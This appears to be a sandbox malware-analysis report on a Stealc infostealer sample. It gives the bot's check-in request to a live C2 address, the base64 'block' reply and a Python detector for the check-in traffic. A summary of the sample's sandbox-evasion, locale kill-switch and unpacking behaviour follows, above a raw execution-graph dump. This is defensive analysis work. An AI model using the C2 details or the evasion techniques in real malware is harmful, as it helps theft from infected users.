Oct 2, 2024 03:10:59.520101070 CEST, 412 bytes OUT (C2 check-in):
POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KJJJKFIIIJJJECAAEHDB
Host: 185.215.113.37
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache

Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 34 44 42 35 34 43 38 38 37 34 37 33 36 32 35 36 39 38 33 39 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 2d 2d 0d 0a
Data decoded (211 bytes, CRLF line endings):
------KJJJKFIIIJJJECAAEHDB
Content-Disposition: form-data; name="hwid"

84DB54C887473625698399
------KJJJKFIIIJJJECAAEHDB
Content-Disposition: form-data; name="build"

doma
------KJJJKFIIIJJJECAAEHDB--

The two form fields are the bot's hardware ID (hwid=84DB54C887473625698399) and the build tag (build=doma).

Oct 2, 2024 03:10:59.743675947 CEST, 210 bytes IN:
HTTP/1.1 200 OK
Date: Wed, 02 Oct 2024 01:10:59 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s=

The body is base64 for the string "block". No further request follows it (the client's last packet at 03:11:02 ends the session), so the server refused this bot and the stealer never downloaded its configuration or uploaded anything; the behaviour captured in this run is the packer, the evasion checks and the check-in only.
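To make the exchange above mechanically checkable, here is an added example (my code, not Joe Sandbox output) that parses the multipart check-in body, decodes the server's reply and applies three indicators taken from this capture: a POST to a 16-hex-character .php path, a multipart body whose only fields are hwid and build, and a missing User-Agent header. The request bytes are reconstructed from the report's raw dump; the indicators are my own reading of this one capture, not the content of Suricata rule 2044243.

```python
"""Parse and classify the Stealc check-in captured in this report (example code)."""
import base64
import re
from typing import Dict, List

# Reconstructed from the report's raw dump of the POST body (Content-Length 211).
BOUNDARY = b"----KJJJKFIIIJJJECAAEHDB"
CHECKIN_BODY = (
    b"------KJJJKFIIIJJJECAAEHDB\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    b"84DB54C887473625698399\r\n"
    b"------KJJJKFIIIJJJECAAEHDB\r\n"
    b'Content-Disposition: form-data; name="build"\r\n\r\n'
    b"doma\r\n"
    b"------KJJJKFIIIJJJECAAEHDB--\r\n"
)
CHECKIN_HEADERS = {
    "Content-Type": "multipart/form-data; boundary=----KJJJKFIIIJJJECAAEHDB",
    "Host": "185.215.113.37",
    "Content-Length": "211",
    "Connection": "Keep-Alive",
    "Cache-Control": "no-cache",
}
C2_REPLY = b"YmxvY2s="   # the 8-byte response body from the report

_NAME = re.compile(rb'name="([^"]+)"')


def parse_multipart(body: bytes, boundary: bytes) -> Dict[str, bytes]:
    """Minimal multipart/form-data parser: {field name: raw value}."""
    delimiter = b"--" + boundary
    fields: Dict[str, bytes] = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):          # "--boundary--" closes the body
            break
        head, _, value = part.partition(b"\r\n\r\n")
        m = _NAME.search(head)
        if m:
            fields[m.group(1).decode()] = value.rstrip(b"\r\n")
    return fields


def boundary_from_content_type(content_type: str) -> bytes:
    m = re.search(r"boundary=([^;]+)", content_type)
    if not m:
        raise ValueError("not multipart/form-data")
    return m.group(1).strip().encode()


def decode_reply(reply: bytes) -> str:
    """C2 replies in this family are base64 text; here it decodes to 'block'."""
    return base64.b64decode(reply, validate=True).decode("ascii", "replace")


def checkin_indicators(method: str, path: str, headers: Dict[str, str], body: bytes) -> List[str]:
    """Return the indicators (from this capture) that a request matches; [] means none."""
    hits: List[str] = []
    if method == "POST" and re.fullmatch(r"/[0-9a-f]{16}\.php", path):
        hits.append("POST to /<16 hex chars>.php")
    if "User-Agent" not in headers:
        hits.append("no User-Agent header")
    ctype = headers.get("Content-Type", "")
    if ctype.startswith("multipart/form-data"):
        fields = parse_multipart(body, boundary_from_content_type(ctype))
        if set(fields) == {"hwid", "build"}:
            hits.append("multipart fields are exactly hwid + build")
    return hits


if __name__ == "__main__":
    print(parse_multipart(CHECKIN_BODY, BOUNDARY))
    print(decode_reply(C2_REPLY))
    print(checkin_indicators("POST", "/e2b1563c6670f193.php", CHECKIN_HEADERS, CHECKIN_BODY))
```

Treat the three indicators together as the signal; any one of them alone (a missing User-Agent in particular) occurs in plenty of benign WinINet traffic.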



                        Target ID:0
                        Start time:21:10:55
                        Start date:01/10/2024
                        Path:C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\file.exe"
                        Imagebase:0x380000
                        File size:1'878'016 bytes
                        MD5 hash:44397C793B2976C5571C32B11842E395
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1701295497.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1658803350.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true


Execution Graph

Execution Coverage: 8.5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 9.7%
Total number of Nodes: 2000
Total number of Limit Nodes: 24

The dump that follows is the analyser's raw node list (node id, address in the 0x380000 runtime image, APIs called, edges). The chains worth reading out of it, all visible in the text below, are:
• 0x382260 calls 0x3845c0 about forty times in a row; each call does RtlAllocateHeap followed by VirtualProtect, which is the section-rights change behind "Detected unpacking (changes PE section rights)".
• 0x399860: GetPEB, then five LoadLibraryA calls and a run of GetProcAddress calls, i.e. the real import table is built at run time (the file imports only lstrcpy).
• 0x3811d0 and its callees 0x381160, 0x381110, 0x3810a0 and 0x3989b0: GetSystemInfo, GetCurrentProcess plus VirtualAllocExNuma, VirtualAlloc/VirtualFree and GlobalMemoryStatusEx, each with an ExitProcess edge, consistent with CPU-count and memory-size checks against an undersized sandbox VM.
• 0x396770: GetUserDefaultLangID followed by five separate ExitProcess branches, i.e. the sample terminates for a set of system locales (the locale values are not recoverable from the graph).
• 0x396920: GetSystemTime, sscanf, two SystemTimeToFileTime calls and an ExitProcess branch, consistent with comparing the current date against a hard-coded expiry date.
• 0x3969f0: OpenEventA; if the named event exists the code loops through CloseHandle and Sleep, otherwise it calls CreateEventA, i.e. a named event used as a single-instance guard.
• 0x397850 and 0x3978e0: GetProcessHeap, RtlAllocateHeap and GetUserNameA / GetComputerNameA, followed by lstrlen/lstrcpy/lstrcat string building; 0x397500: GetWindowsDirectoryA; 0x384fb0: InternetOpenA, the start of the WinINet session shown in the network section.
                          execution_graph 13040 3969f0 13085 382260 13040->13085 13064 396a64 13065 39a9b0 4 API calls 13064->13065 13066 396a6b 13065->13066 13067 39a9b0 4 API calls 13066->13067 13068 396a72 13067->13068 13069 39a9b0 4 API calls 13068->13069 13070 396a79 13069->13070 13071 39a9b0 4 API calls 13070->13071 13072 396a80 13071->13072 13237 39a8a0 13072->13237 13074 396b0c 13241 396920 GetSystemTime 13074->13241 13075 396a89 13075->13074 13077 396ac2 OpenEventA 13075->13077 13079 396ad9 13077->13079 13080 396af5 CloseHandle Sleep 13077->13080 13084 396ae1 CreateEventA 13079->13084 13082 396b0a 13080->13082 13082->13075 13084->13074 13438 3845c0 13085->13438 13087 382274 13088 3845c0 2 API calls 13087->13088 13089 38228d 13088->13089 13090 3845c0 2 API calls 13089->13090 13091 3822a6 13090->13091 13092 3845c0 2 API calls 13091->13092 13093 3822bf 13092->13093 13094 3845c0 2 API calls 13093->13094 13095 3822d8 13094->13095 13096 3845c0 2 API calls 13095->13096 13097 3822f1 13096->13097 13098 3845c0 2 API calls 13097->13098 13099 38230a 13098->13099 13100 3845c0 2 API calls 13099->13100 13101 382323 13100->13101 13102 3845c0 2 API calls 13101->13102 13103 38233c 13102->13103 13104 3845c0 2 API calls 13103->13104 13105 382355 13104->13105 13106 3845c0 2 API calls 13105->13106 13107 38236e 13106->13107 13108 3845c0 2 API calls 13107->13108 13109 382387 13108->13109 13110 3845c0 2 API calls 13109->13110 13111 3823a0 13110->13111 13112 3845c0 2 API calls 13111->13112 13113 3823b9 13112->13113 13114 3845c0 2 API calls 13113->13114 13115 3823d2 13114->13115 13116 3845c0 2 API calls 13115->13116 13117 3823eb 13116->13117 13118 3845c0 2 API calls 13117->13118 13119 382404 13118->13119 13120 3845c0 2 API calls 13119->13120 13121 38241d 13120->13121 13122 3845c0 2 API calls 13121->13122 13123 382436 13122->13123 13124 3845c0 2 API calls 13123->13124 13125 38244f 13124->13125 13126 3845c0 2 API calls 13125->13126 13127 382468 13126->13127 13128 3845c0 2 API calls 
385f61 14534->14539 14535->14460 14537 39a9b0 4 API calls 14537->14539 14538 39a8a0 lstrcpy 14538->14539 14539->14534 14539->14535 14539->14537 14539->14538 14542 391077 14540->14542 14541 391151 14541->13311 14542->14541 14543 39a820 lstrlen lstrcpy 14542->14543 14543->14542 14545 390db7 14544->14545 14546 390f17 14545->14546 14547 390ea4 StrCmpCA 14545->14547 14548 390e27 StrCmpCA 14545->14548 14549 390e67 StrCmpCA 14545->14549 14550 39a820 lstrlen lstrcpy 14545->14550 14546->13319 14547->14545 14548->14545 14549->14545 14550->14545 14554 390f67 14551->14554 14552 391044 14552->13327 14553 390fb2 StrCmpCA 14553->14554 14554->14552 14554->14553 14555 39a820 lstrlen lstrcpy 14554->14555 14555->14554 14557 39a740 lstrcpy 14556->14557 14558 391a26 14557->14558 14559 39a9b0 4 API calls 14558->14559 14560 391a37 14559->14560 14561 39a8a0 lstrcpy 14560->14561 14562 391a40 14561->14562 14563 39a9b0 4 API calls 14562->14563 14564 391a5b 14563->14564 14565 39a8a0 lstrcpy 14564->14565 14566 391a64 14565->14566 14567 39a9b0 4 API calls 14566->14567 14568 391a7d 14567->14568 14569 39a8a0 lstrcpy 14568->14569 14570 391a86 14569->14570 14571 39a9b0 4 API calls 14570->14571 14572 391aa1 14571->14572 14573 39a8a0 lstrcpy 14572->14573 14574 391aaa 14573->14574 14575 39a9b0 4 API calls 14574->14575 14576 391ac3 14575->14576 14577 39a8a0 lstrcpy 14576->14577 14578 391acc 14577->14578 14579 39a9b0 4 API calls 14578->14579 14580 391ae7 14579->14580 14581 39a8a0 lstrcpy 14580->14581 14582 391af0 14581->14582 14583 39a9b0 4 API calls 14582->14583 14584 391b09 14583->14584 14585 39a8a0 lstrcpy 14584->14585 14586 391b12 14585->14586 14587 39a9b0 4 API calls 14586->14587 14588 391b2d 14587->14588 14589 39a8a0 lstrcpy 14588->14589 14590 391b36 14589->14590 14591 39a9b0 4 API calls 14590->14591 14592 391b4f 14591->14592 14593 39a8a0 lstrcpy 14592->14593 14594 391b58 14593->14594 14595 39a9b0 4 API calls 14594->14595 14596 391b76 14595->14596 14597 39a8a0 lstrcpy 14596->14597 14598 391b7f 
14597->14598 14599 397500 6 API calls 14598->14599 14600 391b96 14599->14600 14601 39a920 3 API calls 14600->14601 14602 391ba9 14601->14602 14603 39a8a0 lstrcpy 14602->14603 14604 391bb2 14603->14604 14605 39a9b0 4 API calls 14604->14605 14606 391bdc 14605->14606 14607 39a8a0 lstrcpy 14606->14607 14608 391be5 14607->14608 14609 39a9b0 4 API calls 14608->14609 14610 391c05 14609->14610 14611 39a8a0 lstrcpy 14610->14611 14612 391c0e 14611->14612 15320 397690 GetProcessHeap RtlAllocateHeap 14612->15320 14615 39a9b0 4 API calls 14616 391c2e 14615->14616 14617 39a8a0 lstrcpy 14616->14617 14618 391c37 14617->14618 14619 39a9b0 4 API calls 14618->14619 14620 391c56 14619->14620 14621 39a8a0 lstrcpy 14620->14621 14622 391c5f 14621->14622 14623 39a9b0 4 API calls 14622->14623 14624 391c80 14623->14624 14625 39a8a0 lstrcpy 14624->14625 14626 391c89 14625->14626 15327 3977c0 GetCurrentProcess IsWow64Process 14626->15327 14629 39a9b0 4 API calls 14630 391ca9 14629->14630 14631 39a8a0 lstrcpy 14630->14631 14632 391cb2 14631->14632 14633 39a9b0 4 API calls 14632->14633 14634 391cd1 14633->14634 14635 39a8a0 lstrcpy 14634->14635 14636 391cda 14635->14636 14637 39a9b0 4 API calls 14636->14637 14638 391cfb 14637->14638 14639 39a8a0 lstrcpy 14638->14639 14640 391d04 14639->14640 14641 397850 3 API calls 14640->14641 14642 391d14 14641->14642 14643 39a9b0 4 API calls 14642->14643 14644 391d24 14643->14644 14645 39a8a0 lstrcpy 14644->14645 14646 391d2d 14645->14646 14647 39a9b0 4 API calls 14646->14647 14648 391d4c 14647->14648 14649 39a8a0 lstrcpy 14648->14649 14650 391d55 14649->14650 14651 39a9b0 4 API calls 14650->14651 14652 391d75 14651->14652 14653 39a8a0 lstrcpy 14652->14653 14654 391d7e 14653->14654 14655 3978e0 3 API calls 14654->14655 14656 391d8e 14655->14656 14657 39a9b0 4 API calls 14656->14657 14658 391d9e 14657->14658 14659 39a8a0 lstrcpy 14658->14659 14660 391da7 14659->14660 14661 39a9b0 4 API calls 14660->14661 14662 391dc6 14661->14662 14663 39a8a0 lstrcpy 
14662->14663 14664 391dcf 14663->14664 14665 39a9b0 4 API calls 14664->14665 14666 391df0 14665->14666 14667 39a8a0 lstrcpy 14666->14667 14668 391df9 14667->14668 15329 397980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14668->15329 14671 39a9b0 4 API calls 14672 391e19 14671->14672 14673 39a8a0 lstrcpy 14672->14673 14674 391e22 14673->14674 14675 39a9b0 4 API calls 14674->14675 14676 391e41 14675->14676 14677 39a8a0 lstrcpy 14676->14677 14678 391e4a 14677->14678 14679 39a9b0 4 API calls 14678->14679 14680 391e6b 14679->14680 14681 39a8a0 lstrcpy 14680->14681 14682 391e74 14681->14682 15331 397a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14682->15331 14685 39a9b0 4 API calls 14686 391e94 14685->14686 14687 39a8a0 lstrcpy 14686->14687 14688 391e9d 14687->14688 14689 39a9b0 4 API calls 14688->14689 14690 391ebc 14689->14690 14691 39a8a0 lstrcpy 14690->14691 14692 391ec5 14691->14692 14693 39a9b0 4 API calls 14692->14693 14694 391ee5 14693->14694 14695 39a8a0 lstrcpy 14694->14695 14696 391eee 14695->14696 15334 397b00 GetUserDefaultLocaleName 14696->15334 14699 39a9b0 4 API calls 14700 391f0e 14699->14700 14701 39a8a0 lstrcpy 14700->14701 14702 391f17 14701->14702 14703 39a9b0 4 API calls 14702->14703 14704 391f36 14703->14704 14705 39a8a0 lstrcpy 14704->14705 14706 391f3f 14705->14706 14707 39a9b0 4 API calls 14706->14707 14708 391f60 14707->14708 14709 39a8a0 lstrcpy 14708->14709 14710 391f69 14709->14710 15338 397b90 14710->15338 14712 391f80 14713 39a920 3 API calls 14712->14713 14714 391f93 14713->14714 14715 39a8a0 lstrcpy 14714->14715 14716 391f9c 14715->14716 14717 39a9b0 4 API calls 14716->14717 14718 391fc6 14717->14718 14719 39a8a0 lstrcpy 14718->14719 14720 391fcf 14719->14720 14721 39a9b0 4 API calls 14720->14721 14722 391fef 14721->14722 14723 39a8a0 lstrcpy 14722->14723 14724 391ff8 14723->14724 15350 397d80 GetSystemPowerStatus 14724->15350 14727 39a9b0 4 API calls 14728 392018 14727->14728 14729 39a8a0 lstrcpy 14728->14729 14730 
392021 14729->14730 14731 39a9b0 4 API calls 14730->14731 14732 392040 14731->14732 14733 39a8a0 lstrcpy 14732->14733 14734 392049 14733->14734 14735 39a9b0 4 API calls 14734->14735 14736 39206a 14735->14736 14737 39a8a0 lstrcpy 14736->14737 14738 392073 14737->14738 14739 39207e GetCurrentProcessId 14738->14739 15352 399470 OpenProcess 14739->15352 14742 39a920 3 API calls 14743 3920a4 14742->14743 14744 39a8a0 lstrcpy 14743->14744 14745 3920ad 14744->14745 14746 39a9b0 4 API calls 14745->14746 14747 3920d7 14746->14747 14748 39a8a0 lstrcpy 14747->14748 14749 3920e0 14748->14749 14750 39a9b0 4 API calls 14749->14750 14751 392100 14750->14751 14752 39a8a0 lstrcpy 14751->14752 14753 392109 14752->14753 15357 397e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14753->15357 14756 39a9b0 4 API calls 14757 392129 14756->14757 14758 39a8a0 lstrcpy 14757->14758 14759 392132 14758->14759 14760 39a9b0 4 API calls 14759->14760 14761 392151 14760->14761 14762 39a8a0 lstrcpy 14761->14762 14763 39215a 14762->14763 14764 39a9b0 4 API calls 14763->14764 14765 39217b 14764->14765 14766 39a8a0 lstrcpy 14765->14766 14767 392184 14766->14767 15361 397f60 14767->15361 14770 39a9b0 4 API calls 14771 3921a4 14770->14771 14772 39a8a0 lstrcpy 14771->14772 14773 3921ad 14772->14773 14774 39a9b0 4 API calls 14773->14774 14775 3921cc 14774->14775 14776 39a8a0 lstrcpy 14775->14776 14777 3921d5 14776->14777 14778 39a9b0 4 API calls 14777->14778 14779 3921f6 14778->14779 14780 39a8a0 lstrcpy 14779->14780 14781 3921ff 14780->14781 15374 397ed0 GetSystemInfo wsprintfA 14781->15374 14784 39a9b0 4 API calls 14785 39221f 14784->14785 14786 39a8a0 lstrcpy 14785->14786 14787 392228 14786->14787 14788 39a9b0 4 API calls 14787->14788 14789 392247 14788->14789 14790 39a8a0 lstrcpy 14789->14790 14791 392250 14790->14791 14792 39a9b0 4 API calls 14791->14792 14793 392270 14792->14793 14794 39a8a0 lstrcpy 14793->14794 14795 392279 14794->14795 15376 398100 GetProcessHeap RtlAllocateHeap 14795->15376 14798 
39a9b0 4 API calls 14799 392299 14798->14799 14800 39a8a0 lstrcpy 14799->14800 14801 3922a2 14800->14801 14802 39a9b0 4 API calls 14801->14802 14803 3922c1 14802->14803 14804 39a8a0 lstrcpy 14803->14804 14805 3922ca 14804->14805 14806 39a9b0 4 API calls 14805->14806 14807 3922eb 14806->14807 14808 39a8a0 lstrcpy 14807->14808 14809 3922f4 14808->14809 15382 3987c0 14809->15382 14812 39a920 3 API calls 14813 39231e 14812->14813 14814 39a8a0 lstrcpy 14813->14814 14815 392327 14814->14815 14816 39a9b0 4 API calls 14815->14816 14817 392351 14816->14817 14818 39a8a0 lstrcpy 14817->14818 14819 39235a 14818->14819 14820 39a9b0 4 API calls 14819->14820 14821 39237a 14820->14821 14822 39a8a0 lstrcpy 14821->14822 14823 392383 14822->14823 14824 39a9b0 4 API calls 14823->14824 14825 3923a2 14824->14825 14826 39a8a0 lstrcpy 14825->14826 14827 3923ab 14826->14827 15387 3981f0 14827->15387 14829 3923c2 14830 39a920 3 API calls 14829->14830 14831 3923d5 14830->14831 14832 39a8a0 lstrcpy 14831->14832 14833 3923de 14832->14833 14834 39a9b0 4 API calls 14833->14834 14835 39240a 14834->14835 14836 39a8a0 lstrcpy 14835->14836 14837 392413 14836->14837 14838 39a9b0 4 API calls 14837->14838 14839 392432 14838->14839 14840 39a8a0 lstrcpy 14839->14840 14841 39243b 14840->14841 14842 39a9b0 4 API calls 14841->14842 14843 39245c 14842->14843 14844 39a8a0 lstrcpy 14843->14844 14845 392465 14844->14845 14846 39a9b0 4 API calls 14845->14846 14847 392484 14846->14847 14848 39a8a0 lstrcpy 14847->14848 14849 39248d 14848->14849 14850 39a9b0 4 API calls 14849->14850 14851 3924ae 14850->14851 14852 39a8a0 lstrcpy 14851->14852 14853 3924b7 14852->14853 15395 398320 14853->15395 14855 3924d3 14856 39a920 3 API calls 14855->14856 14857 3924e6 14856->14857 14858 39a8a0 lstrcpy 14857->14858 14859 3924ef 14858->14859 14860 39a9b0 4 API calls 14859->14860 14861 392519 14860->14861 14862 39a8a0 lstrcpy 14861->14862 14863 392522 14862->14863 14864 39a9b0 4 API calls 14863->14864 14865 392543 14864->14865 
14866 39a8a0 lstrcpy 14865->14866 14867 39254c 14866->14867 14868 398320 17 API calls 14867->14868 14869 392568 14868->14869 14870 39a920 3 API calls 14869->14870 14871 39257b 14870->14871 14872 39a8a0 lstrcpy 14871->14872 14873 392584 14872->14873 14874 39a9b0 4 API calls 14873->14874 14875 3925ae 14874->14875 14876 39a8a0 lstrcpy 14875->14876 14877 3925b7 14876->14877 14878 39a9b0 4 API calls 14877->14878 14879 3925d6 14878->14879 14880 39a8a0 lstrcpy 14879->14880 14881 3925df 14880->14881 14882 39a9b0 4 API calls 14881->14882 14883 392600 14882->14883 14884 39a8a0 lstrcpy 14883->14884 14885 392609 14884->14885 15431 398680 14885->15431 14887 392620 14888 39a920 3 API calls 14887->14888 14889 392633 14888->14889 14890 39a8a0 lstrcpy 14889->14890 14891 39263c 14890->14891 14892 39265a lstrlen 14891->14892 14893 39266a 14892->14893 14894 39a740 lstrcpy 14893->14894 14895 39267c 14894->14895 14896 381590 lstrcpy 14895->14896 14897 39268d 14896->14897 15441 395190 14897->15441 14899 392699 14899->13331 15629 39aad0 14900->15629 14902 385009 InternetOpenUrlA 14906 385021 14902->14906 14903 38502a InternetReadFile 14903->14906 14904 3850a0 InternetCloseHandle InternetCloseHandle 14905 3850ec 14904->14905 14905->13335 14906->14903 14906->14904 15630 3898d0 14907->15630 14909 390759 14910 390a38 14909->14910 14911 39077d 14909->14911 14912 381590 lstrcpy 14910->14912 14914 390799 StrCmpCA 14911->14914 14913 390a49 14912->14913 15806 390250 14913->15806 14916 3907a8 14914->14916 14940 390843 14914->14940 14918 39a7a0 lstrcpy 14916->14918 14920 3907c3 14918->14920 14919 390865 StrCmpCA 14921 390874 14919->14921 14959 39096b 14919->14959 14922 381590 lstrcpy 14920->14922 14923 39a740 lstrcpy 14921->14923 14924 39080c 14922->14924 14926 390881 14923->14926 14927 39a7a0 lstrcpy 14924->14927 14925 39099c StrCmpCA 14928 3909ab 14925->14928 14948 390a2d 14925->14948 14929 39a9b0 4 API calls 14926->14929 14930 390823 14927->14930 14931 381590 lstrcpy 14928->14931 14932 3908ac 
14929->14932 14933 39a7a0 lstrcpy 14930->14933 14934 3909f4 14931->14934 14935 39a920 3 API calls 14932->14935 14936 39083e 14933->14936 14937 39a7a0 lstrcpy 14934->14937 14938 3908b3 14935->14938 15633 38fb00 14936->15633 14941 390a0d 14937->14941 14942 39a9b0 4 API calls 14938->14942 14940->14919 14943 39a7a0 lstrcpy 14941->14943 14944 3908ba 14942->14944 14945 390a28 14943->14945 14946 39a8a0 lstrcpy 14944->14946 15749 390030 14945->15749 14948->13339 14959->14925 15281 39a7a0 lstrcpy 15280->15281 15282 381683 15281->15282 15283 39a7a0 lstrcpy 15282->15283 15284 381695 15283->15284 15285 39a7a0 lstrcpy 15284->15285 15286 3816a7 15285->15286 15287 39a7a0 lstrcpy 15286->15287 15288 3815a3 15287->15288 15288->14162 15290 3847c6 15289->15290 15291 384838 lstrlen 15290->15291 15315 39aad0 15291->15315 15293 384848 InternetCrackUrlA 15294 384867 15293->15294 15294->14239 15296 39a740 lstrcpy 15295->15296 15297 398b74 15296->15297 15298 39a740 lstrcpy 15297->15298 15299 398b82 GetSystemTime 15298->15299 15300 398b99 15299->15300 15301 39a7a0 lstrcpy 15300->15301 15302 398bfc 15301->15302 15302->14254 15304 39a931 15303->15304 15305 39a988 15304->15305 15307 39a968 lstrcpy lstrcat 15304->15307 15306 39a7a0 lstrcpy 15305->15306 15308 39a994 15306->15308 15307->15305 15308->14257 15309->14372 15311 389af9 LocalAlloc 15310->15311 15312 384eee 15310->15312 15311->15312 15313 389b14 CryptStringToBinaryA 15311->15313 15312->14260 15312->14262 15313->15312 15314 389b39 LocalFree 15313->15314 15314->15312 15315->15293 15316->14382 15317->14523 15318->14525 15319->14533 15448 3977a0 15320->15448 15323 3976c6 RegOpenKeyExA 15324 397704 RegCloseKey 15323->15324 15325 3976e7 RegQueryValueExA 15323->15325 15326 391c1e 15324->15326 15325->15324 15326->14615 15328 391c99 15327->15328 15328->14629 15330 391e09 15329->15330 15330->14671 15332 397a9a wsprintfA 15331->15332 15333 391e84 15331->15333 15332->15333 15333->14685 15335 397b4d 15334->15335 15337 391efe 15334->15337 15455 398d20 
LocalAlloc CharToOemW 15335->15455 15337->14699 15339 39a740 lstrcpy 15338->15339 15340 397bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15339->15340 15349 397c25 15340->15349 15341 397d18 15343 397d28 15341->15343 15344 397d1e LocalFree 15341->15344 15342 397c46 GetLocaleInfoA 15342->15349 15346 39a7a0 lstrcpy 15343->15346 15344->15343 15345 39a9b0 lstrcpy lstrlen lstrcpy lstrcat 15345->15349 15348 397d37 15346->15348 15347 39a8a0 lstrcpy 15347->15349 15348->14712 15349->15341 15349->15342 15349->15345 15349->15347 15351 392008 15350->15351 15351->14727 15353 399493 GetModuleFileNameExA CloseHandle 15352->15353 15354 3994b5 15352->15354 15353->15354 15355 39a740 lstrcpy 15354->15355 15356 392091 15355->15356 15356->14742 15358 397e68 RegQueryValueExA 15357->15358 15359 392119 15357->15359 15360 397e8e RegCloseKey 15358->15360 15359->14756 15360->15359 15362 397fb9 GetLogicalProcessorInformationEx 15361->15362 15363 397fd8 GetLastError 15362->15363 15369 398029 15362->15369 15364 398022 15363->15364 15373 397fe3 15363->15373 15365 392194 15364->15365 15368 3989f0 2 API calls 15364->15368 15365->14770 15368->15365 15370 3989f0 2 API calls 15369->15370 15371 39807b 15370->15371 15371->15364 15372 398084 wsprintfA 15371->15372 15372->15365 15373->15362 15373->15365 15456 3989f0 15373->15456 15459 398a10 GetProcessHeap RtlAllocateHeap 15373->15459 15375 39220f 15374->15375 15375->14784 15377 3989b0 15376->15377 15378 39814d GlobalMemoryStatusEx 15377->15378 15381 398163 __aulldiv 15378->15381 15379 39819b wsprintfA 15380 392289 15379->15380 15380->14798 15381->15379 15383 3987fb GetProcessHeap RtlAllocateHeap wsprintfA 15382->15383 15385 39a740 lstrcpy 15383->15385 15386 39230b 15385->15386 15386->14812 15388 39a740 lstrcpy 15387->15388 15394 398229 15388->15394 15389 398263 15390 39a7a0 lstrcpy 15389->15390 15392 3982dc 15390->15392 15391 39a9b0 lstrcpy lstrlen lstrcpy lstrcat 15391->15394 15392->14829 15393 39a8a0 lstrcpy 15393->15394 15394->15389 
15394->15391 15394->15393 15396 39a740 lstrcpy 15395->15396 15397 39835c RegOpenKeyExA 15396->15397 15398 3983ae 15397->15398 15399 3983d0 15397->15399 15400 39a7a0 lstrcpy 15398->15400 15401 3983f8 RegEnumKeyExA 15399->15401 15402 398613 RegCloseKey 15399->15402 15411 3983bd 15400->15411 15403 39843f wsprintfA RegOpenKeyExA 15401->15403 15404 39860e 15401->15404 15405 39a7a0 lstrcpy 15402->15405 15406 3984c1 RegQueryValueExA 15403->15406 15407 398485 RegCloseKey RegCloseKey 15403->15407 15404->15402 15405->15411 15409 3984fa lstrlen 15406->15409 15410 398601 RegCloseKey 15406->15410 15408 39a7a0 lstrcpy 15407->15408 15408->15411 15409->15410 15412 398510 15409->15412 15410->15404 15411->14855 15413 39a9b0 4 API calls 15412->15413 15414 398527 15413->15414 15415 39a8a0 lstrcpy 15414->15415 15416 398533 15415->15416 15417 39a9b0 4 API calls 15416->15417 15418 398557 15417->15418 15419 39a8a0 lstrcpy 15418->15419 15420 398563 15419->15420 15421 39856e RegQueryValueExA 15420->15421 15421->15410 15422 3985a3 15421->15422 15423 39a9b0 4 API calls 15422->15423 15424 3985ba 15423->15424 15425 39a8a0 lstrcpy 15424->15425 15426 3985c6 15425->15426 15427 39a9b0 4 API calls 15426->15427 15428 3985ea 15427->15428 15429 39a8a0 lstrcpy 15428->15429 15430 3985f6 15429->15430 15430->15410 15432 39a740 lstrcpy 15431->15432 15433 3986bc CreateToolhelp32Snapshot Process32First 15432->15433 15434 3986e8 Process32Next 15433->15434 15435 39875d CloseHandle 15433->15435 15434->15435 15440 3986fd 15434->15440 15436 39a7a0 lstrcpy 15435->15436 15439 398776 15436->15439 15437 39a9b0 lstrcpy lstrlen lstrcpy lstrcat 15437->15440 15438 39a8a0 lstrcpy 15438->15440 15439->14887 15440->15434 15440->15437 15440->15438 15442 39a7a0 lstrcpy 15441->15442 15443 3951b5 15442->15443 15444 381590 lstrcpy 15443->15444 15445 3951c6 15444->15445 15460 385100 15445->15460 15447 3951cf 15447->14899 15451 397720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15448->15451 15450 3976b9 15450->15323 15450->15326 
